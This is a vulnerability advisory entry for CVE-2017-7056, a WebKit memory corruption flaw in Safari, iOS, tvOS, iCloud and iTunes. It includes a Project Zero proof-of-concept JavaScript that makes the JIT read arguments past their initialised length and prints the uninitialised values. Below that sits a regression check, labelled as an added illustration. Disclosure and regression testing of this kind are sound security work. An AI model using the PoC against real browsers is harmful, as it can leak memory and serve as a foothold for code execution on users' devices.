WebKit Security Vulnerability in Multiple Apple Products

Vulnerability ID: 1124124    Vulnerability type: buffer overflow
Published: 2017-07-25    Updated: 2017-07-25
CVE ID: CVE-2017-7056    CNNVD ID: CNNVD-201707-954
Platform: Multiple    CVSS score: 7.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/42376
https://cxsecurity.com/issue/WLB-2017070165
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201707-954
|Vulnerability Details
Apple iOS, iCloud for Windows, iTunes for Windows, Safari and tvOS are all products of Apple Inc. (USA). Apple iOS is an operating system developed for mobile devices; Safari is a web browser and the default browser shipped with Mac OS X and iOS. WebKit is an open-source web browser engine developed by the KDE community and currently used by browsers such as Apple Safari and Google Chrome. A memory corruption vulnerability exists in the WebKit component of multiple Apple products. A remote attacker can exploit it via a specially crafted website to execute arbitrary code or cause a denial of service (memory corruption and application crash). The following products and versions are affected: Apple Safari before 10.1.2; tvOS before 10.2.2; iOS before 10.3.3; iCloud for Windows before 6.2.2; iTunes for Windows before 12.6.2.
|Exploit (PoC)
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1262

Here is a snippet of ArgumentsEliminationPhase::transform
    case LoadVarargs:
        ...
        if (candidate->op() == PhantomNewArrayWithSpread || candidate->op() == PhantomSpread) {
            ...
            if (argumentCountIncludingThis <= varargsData->limit) {
                storeArgumentCountIncludingThis(argumentCountIncludingThis);
                // store arguments
                ...
            }

            node->remove();
            node->origin.exitOK = canExit;
            break;
        }

Whether or not the "argumentCountIncludingThis <= varargsData->limit" condition is satisfied, it removes the |node| variable and exits the switch statement. So in the case where the condition is not satisfied, the arguments object created by the following code (CreateDirectArguments in the PoC) may have uninitialized values and length.

PoC:
-->

const kArgsLength = 0x101;

let buggy = null;
function inlineFunc() {
    if (arguments.length != kArgsLength) {
        buggy = arguments;
    }
}

class ClassForInine extends inlineFunc {
}

function sleep(ms) {
    let start = new Date();
    while (new Date() - start < ms);
}

function main() {
    let args = new Array(kArgsLength);
    args.fill(333 + 1);
    args = args.join(', ');

    let opt = new Function(`(() => {
        new ClassForInine(${args});
    })();`);

    for (let i = 0; i < 0x100000; i++) {
        opt();

        if (i === 0x3000)
            sleep(1000);

        if (buggy) {
            print('buggy.length: ' + buggy.length);
            break;
        }
    }

    for (let i = 0, n = buggy.length; i < n; i++) {
        print(buggy[i]);
    }
}

main();
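A regression-style check for the invariant that this bug broke, added here as an illustration; it is not part of the advisory or of the Project Zero report. It assumes only standard ECMAScript: a derived class whose implicit constructor forwards its arguments to a base function must see the correct `arguments.length` and fully initialized values in the base, regardless of how many arguments are passed and whether the call has been inlined by a JIT. On a patched engine `runRegression()` returns true.

```javascript
// Added example (not from the advisory or the Project Zero report): a
// regression-style check for the invariant CVE-2017-7056 violated. When a
// derived class's implicit constructor forwards its arguments to an inlined
// base function, the base's `arguments` object must report the real length
// and hold the real values. On a fixed engine this holds on every JIT tier.

function base() {
    // Record what the engine claims about `arguments` for later checking.
    base.observed = { length: arguments.length, values: Array.from(arguments) };
}

class Derived extends base {} // implicit constructor(...args) { super(...args); }

// Returns true if `arguments` inside `base` was fully initialized with the
// expected length and values for this call; false on the first mismatch.
function argumentsIntegrityHolds(args) {
    new Derived(...args);
    const seen = base.observed;
    if (seen.length !== args.length) return false;
    for (let i = 0; i < args.length; i++) {
        if (seen.values[i] !== args[i]) return false;
    }
    return true;
}

// Constructed sample inputs: a small count (below any varargs limit), a
// medium count, and the 257-argument shape used by the PoC above, so both
// sides of the "argumentCountIncludingThis <= limit" split are exercised.
const SAMPLE_COUNTS = [1, 16, 0x101];
const sampleInputs = SAMPLE_COUNTS.map(n => new Array(n).fill(333 + 1));

// Repeat enough times that a JIT can tier up and inline `base`, the path the
// bug lived on; every iteration must still satisfy the invariant.
function runRegression(iterations = 20000) {
    for (let i = 0; i < iterations; i++) {
        for (const args of sampleInputs) {
            if (!argumentsIntegrityHolds(args)) return false;
        }
    }
    return true;
}

console.log(runRegression() ? "arguments invariant held" : "arguments invariant VIOLATED");
```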
|References

Source: CONFIRM
Link: https://support.apple.com/HT207921
Source: CONFIRM
Link: https://support.apple.com/HT207923
Source: CONFIRM
Link: https://support.apple.com/HT207924
Source: CONFIRM
Link: https://support.apple.com/HT207927
Source: CONFIRM
Link: https://support.apple.com/HT207928